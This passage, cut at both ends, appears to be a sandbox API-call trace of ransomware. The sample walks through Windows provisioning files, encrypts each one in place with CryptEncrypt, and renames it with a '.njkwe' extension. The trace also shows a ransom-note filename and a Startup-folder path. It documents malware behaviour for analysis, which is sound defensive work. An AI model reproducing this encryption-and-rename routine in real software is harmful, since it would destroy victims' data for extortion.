(taiwan)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0079.521] GetTickCount () returned 0x115432f [0079.521] GetTickCount () returned 0x115432f [0079.521] GetTickCount () returned 0x115432f [0079.521] GetTickCount () returned 0x115432f [0079.521] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0079.521] GetProcessHeap () returned 0xbe0000 [0079.521] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc52870 [0079.521] ReadFile (in: hFile=0x43c, lpBuffer=0xc52870, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesRead=0x380edc4*=0x284, lpOverlapped=0x0) returned 1 [0079.523] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd7c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.523] WriteFile (in: hFile=0x43c, lpBuffer=0xc52870*, nNumberOfBytesToWrite=0x284, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesWritten=0x380edc4*=0x284, lpOverlapped=0x0) returned 1 [0079.523] GetProcessHeap () returned 0xbe0000 [0079.523] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc52870 | out: hHeap=0xbe0000) returned 1 [0079.523] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.523] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0079.523] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0079.524] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0079.524] CloseHandle (hObject=0x43c) returned 1 [0079.524] GetProcessHeap () returned 0xbe0000 [0079.524] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0079.524] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\437__Connections_Cellular_TransAsia (Taiwan)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 182 [0079.524] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\437__Connections_Cellular_TransAsia (Taiwan)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\437__connections_cellular_transasia (taiwan)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\437__Connections_Cellular_TransAsia (Taiwan)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\437__connections_cellular_transasia (taiwan)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0079.525] GetProcessHeap () returned 0xbe0000 [0079.525] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0079.525] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90ffddb3, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90ffddb3, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90ffddb3, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2cb, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="438__Connections_Cellular_VIBO Telecom (Taiwan)_i0$(__MVID)@WAP.provxml", cAlternateFileName="438__C~1.PRO")) returned 1 [0079.525] lstrcmpiW (lpString1="438__Connections_Cellular_VIBO Telecom (Taiwan)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0079.525] lstrcmpiW (lpString1="438__Connections_Cellular_VIBO Telecom (Taiwan)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0079.525] lstrcmpiW (lpString1="438__Connections_Cellular_VIBO Telecom (Taiwan)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0079.525] lstrcmpiW (lpString1="438__Connections_Cellular_VIBO Telecom (Taiwan)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0079.525] lstrcmpiW (lpString1="438__Connections_Cellular_VIBO Telecom (Taiwan)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0079.525] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\438__Connections_Cellular_VIBO Telecom (Taiwan)_i0$(__MVID)@WAP.provxml") returned 165 [0079.525] StrStrIW (lpFirst="438__Connections_Cellular_VIBO Telecom (Taiwan)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0079.525] lstrcmpW (lpString1="438__Connections_Cellular_VIBO Telecom (Taiwan)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0079.525] lstrcmpW (lpString1="438__Connections_Cellular_VIBO Telecom (Taiwan)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0079.525] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\438__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0079.525] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\438__Connections_Cellular_VIBO Telecom (Taiwan)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\438__connections_cellular_vibo telecom (taiwan)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0079.525] GetTickCount () returned 0x115432f [0079.525] GetTickCount () returned 0x115432f [0079.525] GetTickCount () returned 0x115432f [0079.525] GetTickCount () returned 0x115432f [0079.525] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0079.526] GetProcessHeap () returned 0xbe0000 [0079.526] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc52870 [0079.526] ReadFile (in: hFile=0x43c, lpBuffer=0xc52870, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesRead=0x380edc4*=0x2cb, lpOverlapped=0x0) returned 1 [0079.527] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd35, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.527] WriteFile (in: hFile=0x43c, lpBuffer=0xc52870*, nNumberOfBytesToWrite=0x2cb, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesWritten=0x380edc4*=0x2cb, lpOverlapped=0x0) returned 1 [0079.527] GetProcessHeap () returned 0xbe0000 [0079.527] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc52870 | out: hHeap=0xbe0000) returned 1 [0079.527] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.527] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0079.527] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0079.527] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0079.528] CloseHandle (hObject=0x43c) returned 1 [0079.528] GetProcessHeap () returned 0xbe0000 [0079.528] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0079.528] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\438__Connections_Cellular_VIBO Telecom (Taiwan)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 185 [0079.528] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\438__Connections_Cellular_VIBO Telecom (Taiwan)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\438__connections_cellular_vibo telecom (taiwan)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\438__Connections_Cellular_VIBO Telecom (Taiwan)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\438__connections_cellular_vibo telecom (taiwan)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0079.528] GetProcessHeap () returned 0xbe0000 [0079.528] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0079.528] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90ffddb3, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90ffddb3, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90ffddb3, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2c4, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="439__Connections_Cellular_VIBO Telecom (Taiwan)_i1$(__MVID)@WAP.provxml", cAlternateFileName="439__C~1.PRO")) returned 1 [0079.530] lstrcmpiW (lpString1="439__Connections_Cellular_VIBO Telecom (Taiwan)_i1$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0079.530] lstrcmpiW (lpString1="439__Connections_Cellular_VIBO Telecom (Taiwan)_i1$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0079.530] lstrcmpiW (lpString1="439__Connections_Cellular_VIBO Telecom (Taiwan)_i1$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0079.530] lstrcmpiW (lpString1="439__Connections_Cellular_VIBO Telecom (Taiwan)_i1$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0079.530] lstrcmpiW (lpString1="439__Connections_Cellular_VIBO Telecom (Taiwan)_i1$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0079.530] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\439__Connections_Cellular_VIBO Telecom (Taiwan)_i1$(__MVID)@WAP.provxml") returned 165 [0079.530] StrStrIW (lpFirst="439__Connections_Cellular_VIBO Telecom (Taiwan)_i1$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0079.530] lstrcmpW (lpString1="439__Connections_Cellular_VIBO Telecom (Taiwan)_i1$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0079.530] lstrcmpW (lpString1="439__Connections_Cellular_VIBO Telecom (Taiwan)_i1$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0079.530] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\439__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0079.530] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\439__Connections_Cellular_VIBO Telecom (Taiwan)_i1$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\439__connections_cellular_vibo telecom (taiwan)_i1$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0079.531] GetTickCount () returned 0x115433f [0079.531] GetTickCount () returned 0x115433f [0079.531] GetTickCount () returned 0x115433f [0079.531] GetTickCount () returned 0x115433f [0079.531] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0079.531] GetProcessHeap () returned 0xbe0000 [0079.531] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc52870 [0079.531] ReadFile (in: hFile=0x43c, lpBuffer=0xc52870, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesRead=0x380edc4*=0x2c4, lpOverlapped=0x0) returned 1 [0079.532] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd3c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.532] WriteFile (in: hFile=0x43c, lpBuffer=0xc52870*, nNumberOfBytesToWrite=0x2c4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesWritten=0x380edc4*=0x2c4, lpOverlapped=0x0) returned 1 [0079.532] GetProcessHeap () returned 0xbe0000 [0079.532] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc52870 | out: hHeap=0xbe0000) returned 1 [0079.532] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.532] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0079.533] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0079.533] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0079.533] CloseHandle (hObject=0x43c) returned 1 [0079.533] GetProcessHeap () returned 0xbe0000 [0079.533] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0079.533] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\439__Connections_Cellular_VIBO Telecom (Taiwan)_i1$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 185 [0079.533] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\439__Connections_Cellular_VIBO Telecom (Taiwan)_i1$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\439__connections_cellular_vibo telecom (taiwan)_i1$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\439__Connections_Cellular_VIBO Telecom (Taiwan)_i1$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\439__connections_cellular_vibo telecom (taiwan)_i1$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0079.534] GetProcessHeap () returned 0xbe0000 [0079.534] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0079.534] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90247f0e, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90247f0e, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90247f0e, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x354, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="43__Connections_Cellular_VELCOM (Belarus)_i4$(__MVID)@WAP.provxml", cAlternateFileName="43__CO~1.PRO")) returned 1 [0079.534] lstrcmpiW (lpString1="43__Connections_Cellular_VELCOM (Belarus)_i4$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0079.534] lstrcmpiW (lpString1="43__Connections_Cellular_VELCOM (Belarus)_i4$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0079.534] lstrcmpiW (lpString1="43__Connections_Cellular_VELCOM (Belarus)_i4$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0079.534] lstrcmpiW (lpString1="43__Connections_Cellular_VELCOM (Belarus)_i4$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0079.534] lstrcmpiW (lpString1="43__Connections_Cellular_VELCOM (Belarus)_i4$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0079.534] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\43__Connections_Cellular_VELCOM (Belarus)_i4$(__MVID)@WAP.provxml") returned 159 [0079.534] StrStrIW (lpFirst="43__Connections_Cellular_VELCOM (Belarus)_i4$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0079.534] lstrcmpW (lpString1="43__Connections_Cellular_VELCOM (Belarus)_i4$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0079.534] lstrcmpW (lpString1="43__Connections_Cellular_VELCOM (Belarus)_i4$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0079.534] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\43__Connectio", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0079.534] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\43__Connections_Cellular_VELCOM (Belarus)_i4$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\43__connections_cellular_velcom (belarus)_i4$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0079.534] GetTickCount () returned 0x115433f [0079.534] GetTickCount () returned 0x115433f [0079.534] GetTickCount () returned 0x115433f [0079.534] GetTickCount () returned 0x115433f [0079.535] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0079.535] GetProcessHeap () returned 0xbe0000 [0079.535] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc52870 [0079.535] ReadFile (in: hFile=0x43c, lpBuffer=0xc52870, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesRead=0x380edc4*=0x354, lpOverlapped=0x0) returned 1 [0079.536] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffcac, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.536] WriteFile (in: hFile=0x43c, lpBuffer=0xc52870*, nNumberOfBytesToWrite=0x354, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesWritten=0x380edc4*=0x354, lpOverlapped=0x0) returned 1 [0079.536] GetProcessHeap () returned 0xbe0000 [0079.536] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc52870 | out: hHeap=0xbe0000) returned 1 [0079.536] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.537] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0079.537] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0079.537] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0079.537] CloseHandle (hObject=0x43c) returned 1 [0079.537] GetProcessHeap () returned 0xbe0000 [0079.537] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0079.537] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\43__Connections_Cellular_VELCOM (Belarus)_i4$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 179 [0079.537] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\43__Connections_Cellular_VELCOM (Belarus)_i4$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\43__connections_cellular_velcom (belarus)_i4$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\43__Connections_Cellular_VELCOM (Belarus)_i4$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\43__connections_cellular_velcom (belarus)_i4$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0079.538] GetProcessHeap () returned 0xbe0000 [0079.538] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0079.538] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90ffddb3, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90ffddb3, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90ffddb3, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2bf, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="440__Connections_Cellular_VIBO Telecom (Taiwan)_i2$(__MVID)@WAP.provxml", cAlternateFileName="440__C~1.PRO")) returned 1 [0079.538] lstrcmpiW (lpString1="440__Connections_Cellular_VIBO Telecom (Taiwan)_i2$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0079.538] lstrcmpiW (lpString1="440__Connections_Cellular_VIBO Telecom (Taiwan)_i2$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0079.538] lstrcmpiW (lpString1="440__Connections_Cellular_VIBO Telecom (Taiwan)_i2$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0079.538] lstrcmpiW (lpString1="440__Connections_Cellular_VIBO Telecom (Taiwan)_i2$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0079.538] lstrcmpiW (lpString1="440__Connections_Cellular_VIBO Telecom 